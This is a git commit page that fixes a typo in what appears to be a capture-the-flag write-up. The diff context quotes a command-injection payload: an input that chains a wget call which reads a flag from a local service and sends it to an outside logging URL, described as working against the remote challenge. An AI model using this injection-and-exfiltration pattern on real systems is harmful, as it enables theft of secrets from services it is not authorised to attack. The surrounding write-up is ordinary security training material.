diff options
author | Timber | 2024-06-02 16:40:53 +0200 |
---|---|---|
committer | Timber | 2024-06-02 16:40:53 +0200 |
commit | a146d5304e0ad04949e0f2f974ba982c26785c01 (patch) | |
tree | b87b97dc87e9b11edbd184fac553fdfab1681ab5 | |
parent | a95b3d56a153b520a14a200c79e5e4a62ef1f6ed (diff) |
Fix typo
-rw-r--r-- | even-more-flags.md | 2 |
1 files changed, 1 insertions, 1 deletions
diff --git a/even-more-flags.md b/even-more-flags.md index 9cc1e85..d06fe2c 100644 --- a/even-more-flags.md +++ b/even-more-flags.md @@ -116,6 +116,6 @@ For that the idea is to read the flag and make an http request to some webserver http:./ & wget <some-url-where-we-can-view-logs>?data=`wget localhost:1337/flag -O -` ``` -And indeed, if we run this in our docker, we can see the fake flag being submitted in the docker logs, and the fake flag arriving in our server docs. +And indeed, if we run this in our docker, we can see the fake flag being submitted in the docker logs, and the fake flag arriving in our server logs. If we now use this exploit url on the remote, we **receive our flag!** |